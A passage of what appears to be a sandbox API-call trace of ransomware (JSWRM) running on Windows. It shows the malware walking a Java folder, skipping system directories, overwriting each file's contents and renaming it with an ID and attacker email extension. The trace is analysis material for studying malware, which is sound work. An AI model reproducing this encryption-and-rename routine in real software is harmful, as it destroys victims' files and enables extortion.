files\\java\\jre1.8.0_144\\lib\\images\\cursors\\win32_copynodrop32x32.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0070.580] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dee0 | out: hHeap=0x1e0000) returned 1 [0070.580] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0070.580] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d680 | out: hHeap=0x1e0000) returned 1 [0070.580] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0070.580] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0070.580] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c50c02, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c50c02, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c50c02, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xa8, dwReserved0=0x60002, dwReserved1=0x20933c, cFileName="win32_LinkDrop32x32.gif", cAlternateFileName="WIN32_~3.GIF")) returned 1 [0070.580] lstrcmpiW (lpString1="win32_LinkDrop32x32.gif", lpString2=".") returned 1 [0070.580] lstrcmpiW (lpString1="win32_LinkDrop32x32.gif", lpString2="..") returned 1 [0070.580] lstrcmpiW (lpString1="win32_LinkDrop32x32.gif", lpString2="...") returned 1 [0070.581] lstrcmpiW (lpString1="win32_LinkDrop32x32.gif", lpString2="windows") returned -1 [0070.581] lstrcmpiW (lpString1="win32_LinkDrop32x32.gif", lpString2="recovery") returned 1 [0070.581] lstrcmpiW (lpString1="win32_LinkDrop32x32.gif", lpString2="perflogs") returned 1 [0070.581] lstrcmpiW (lpString1="win32_LinkDrop32x32.gif", lpString2="documents and settings") returned 1 [0070.581] lstrcmpiW (lpString1="win32_LinkDrop32x32.gif", lpString2="$RECYCLE.BIN") returned 1 [0070.581] lstrcmpiW (lpString1="win32_LinkDrop32x32.gif", lpString2="system volume information") returned 1 [0070.581] lstrcmpiW (lpString1="win32_LinkDrop32x32.gif", lpString2="msocache") returned 1 [0070.581] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0070.581] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="win32_LinkDrop32x32.gif", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0070.581] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0070.581] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="win32_LinkDrop32x32.gif", cchWideChar=23, lpMultiByteStr=0x2410d8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="win32_LinkDrop32x32.gif", lpUsedDefaultChar=0x0) returned 23 [0070.581] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0070.581] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0070.581] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="win32_LinkDrop32x32.gif", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0070.581] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0070.581] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="win32_LinkDrop32x32.gif", cchWideChar=23, lpMultiByteStr=0x241308, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="win32_LinkDrop32x32.gif", lpUsedDefaultChar=0x0) returned 23 [0070.581] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0070.581] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0070.581] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d3e0 | out: hHeap=0x1e0000) returned 1 [0070.581] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0070.581] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0070.581] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0070.581] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_LinkDrop32x32.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\win32_linkdrop32x32.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0070.581] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=168) returned 1 [0070.581] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.581] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0070.581] ReadFile (in: hFile=0x45c, lpBuffer=0x23d7d0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x23d7d0*, lpNumberOfBytesRead=0x345e534*=0xa0, lpOverlapped=0x0) returned 1 [0070.582] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.582] WriteFile (in: hFile=0x45c, lpBuffer=0x23d7d0*, nNumberOfBytesToWrite=0xa0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x23d7d0*, lpNumberOfBytesWritten=0x345e530*=0xa0, lpOverlapped=0x0) returned 1 [0070.582] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0070.582] CloseHandle (hObject=0x45c) returned 1 [0070.582] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d338 [0070.582] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0070.583] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0070.583] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0070.583] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0070.583] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0070.583] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0070.583] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0070.583] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0070.583] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0070.583] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235d38 [0070.583] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e110 [0070.583] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235d38 | out: hHeap=0x1e0000) returned 1 [0070.583] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0070.583] MoveFileW (lpExistingFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_LinkDrop32x32.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\win32_linkdrop32x32.gif"), lpNewFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_LinkDrop32x32.gif.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\win32_linkdrop32x32.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0070.583] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e110 | out: hHeap=0x1e0000) returned 1 [0070.583] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d338 | out: hHeap=0x1e0000) returned 1 [0070.583] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0070.583] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0070.583] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0070.583] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c50c02, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c50c02, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c50c02, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x99, dwReserved0=0x60002, dwReserved1=0x20933c, cFileName="win32_LinkNoDrop32x32.gif", cAlternateFileName="WIN32_~4.GIF")) returned 1 [0070.583] lstrcmpiW (lpString1="win32_LinkNoDrop32x32.gif", lpString2=".") returned 1 [0070.583] lstrcmpiW (lpString1="win32_LinkNoDrop32x32.gif", lpString2="..") returned 1 [0070.583] lstrcmpiW (lpString1="win32_LinkNoDrop32x32.gif", lpString2="...") returned 1 [0070.583] lstrcmpiW (lpString1="win32_LinkNoDrop32x32.gif", lpString2="windows") returned -1 [0070.584] lstrcmpiW (lpString1="win32_LinkNoDrop32x32.gif", lpString2="recovery") returned 1 [0070.584] lstrcmpiW (lpString1="win32_LinkNoDrop32x32.gif", lpString2="perflogs") returned 1 [0070.584] lstrcmpiW (lpString1="win32_LinkNoDrop32x32.gif", lpString2="documents and settings") returned 1 [0070.584] lstrcmpiW (lpString1="win32_LinkNoDrop32x32.gif", lpString2="$RECYCLE.BIN") returned 1 [0070.584] lstrcmpiW (lpString1="win32_LinkNoDrop32x32.gif", lpString2="system volume information") returned 1 [0070.584] lstrcmpiW (lpString1="win32_LinkNoDrop32x32.gif", lpString2="msocache") returned 1 [0070.584] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0070.584] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="win32_LinkNoDrop32x32.gif", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0070.584] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0070.584] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="win32_LinkNoDrop32x32.gif", cchWideChar=25, lpMultiByteStr=0x2413a8, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="win32_LinkNoDrop32x32.gif", lpUsedDefaultChar=0x0) returned 25 [0070.584] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0070.584] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0070.584] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="win32_LinkNoDrop32x32.gif", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0070.584] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0070.584] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="win32_LinkNoDrop32x32.gif", cchWideChar=25, lpMultiByteStr=0x241268, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="win32_LinkNoDrop32x32.gif", lpUsedDefaultChar=0x0) returned 25 [0070.584] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0070.584] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0070.584] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0070.584] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0070.584] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0070.584] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d3e0 [0070.584] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_LinkNoDrop32x32.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\win32_linknodrop32x32.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0070.584] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=153) returned 1 [0070.584] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.584] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0070.584] ReadFile (in: hFile=0x45c, lpBuffer=0x23b400, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x23b400*, lpNumberOfBytesRead=0x345e534*=0x90, lpOverlapped=0x0) returned 1 [0070.585] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.585] WriteFile (in: hFile=0x45c, lpBuffer=0x23b400*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x23b400*, lpNumberOfBytesWritten=0x345e530*=0x90, lpOverlapped=0x0) returned 1 [0070.585] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0070.585] CloseHandle (hObject=0x45c) returned 1 [0070.586] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0070.586] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0070.586] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0070.586] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0070.586] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0070.586] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0070.586] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0070.586] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a4b0 [0070.586] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a4b0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0070.586] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a4b0 | out: hHeap=0x1e0000) returned 1 [0070.586] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236ae0 [0070.586] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e458 [0070.586] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236ae0 | out: hHeap=0x1e0000) returned 1 [0070.586] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0070.586] MoveFileW (lpExistingFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_LinkNoDrop32x32.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\win32_linknodrop32x32.gif"), lpNewFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_LinkNoDrop32x32.gif.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\win32_linknodrop32x32.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0070.586] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e458 | out: hHeap=0x1e0000) returned 1 [0070.586] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0070.586] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d3e0 | out: hHeap=0x1e0000) returned 1 [0070.586] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0070.586] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0070.587] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c50c02, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c50c02, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c50c02, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x93, dwReserved0=0x60002, dwReserved1=0x20933c, cFileName="win32_MoveDrop32x32.gif", cAlternateFileName="WI06CF~1.GIF")) returned 1 [0070.587] lstrcmpiW (lpString1="win32_MoveDrop32x32.gif", lpString2=".") returned 1 [0070.587] lstrcmpiW (lpString1="win32_MoveDrop32x32.gif", lpString2="..") returned 1 [0070.587] lstrcmpiW (lpString1="win32_MoveDrop32x32.gif", lpString2="...") returned 1 [0070.587] lstrcmpiW (lpString1="win32_MoveDrop32x32.gif", lpString2="windows") returned -1 [0070.587] lstrcmpiW (lpString1="win32_MoveDrop32x32.gif", lpString2="recovery") returned 1 [0070.587] lstrcmpiW (lpString1="win32_MoveDrop32x32.gif", lpString2="perflogs") returned 1 [0070.587] lstrcmpiW (lpString1="win32_MoveDrop32x32.gif", lpString2="documents and settings") returned 1 [0070.587] lstrcmpiW (lpString1="win32_MoveDrop32x32.gif", lpString2="$RECYCLE.BIN") returned 1 [0070.587] lstrcmpiW (lpString1="win32_MoveDrop32x32.gif", lpString2="system volume information") returned 1 [0070.587] lstrcmpiW (lpString1="win32_MoveDrop32x32.gif", lpString2="msocache") returned 1 [0070.587] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0070.587] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="win32_MoveDrop32x32.gif", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0070.587] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0070.587] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="win32_MoveDrop32x32.gif", cchWideChar=23, lpMultiByteStr=0x241060, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="win32_MoveDrop32x32.gif", lpUsedDefaultChar=0x0) returned 23 [0070.587] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0070.587] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0070.587] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="win32_MoveDrop32x32.gif", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0070.587] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0070.587] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="win32_MoveDrop32x32.gif", cchWideChar=23, lpMultiByteStr=0x241380, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="win32_MoveDrop32x32.gif", lpUsedDefaultChar=0x0) returned 23 [0070.587] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0070.587] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0070.587] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0070.587] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0070.587] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0070.587] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0070.587] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_MoveDrop32x32.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\win32_movedrop32x32.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0070.588] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=147) returned 1 [0070.588] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.588] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0070.588] ReadFile (in: hFile=0x45c, lpBuffer=0x23b400, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x23b400*, lpNumberOfBytesRead=0x345e534*=0x90, lpOverlapped=0x0) returned 1 [0070.658] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.658] WriteFile (in: hFile=0x45c, lpBuffer=0x23b400*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x23b400*, lpNumberOfBytesWritten=0x345e530*=0x90, lpOverlapped=0x0) returned 1 [0070.658] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0070.658] CloseHandle (hObject=0x45c) returned 1 [0070.658] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0070.658] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0070.658] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0070.658] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0070.658] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0070.658] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0070.658] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0070.658] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a378 [0070.658] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a378, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0070.658] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a378 | out: hHeap=0x1e0000) returned 1 [0070.658] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236690 [0070.658] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23eae8 [0070.658] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236690 | out: hHeap=0x1e0000) returned 1 [0070.658] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0070.658] MoveFileW (lpExistingFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_MoveDrop32x32.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\win32_movedrop32x32.gif"), lpNewFileName="C:\\Program 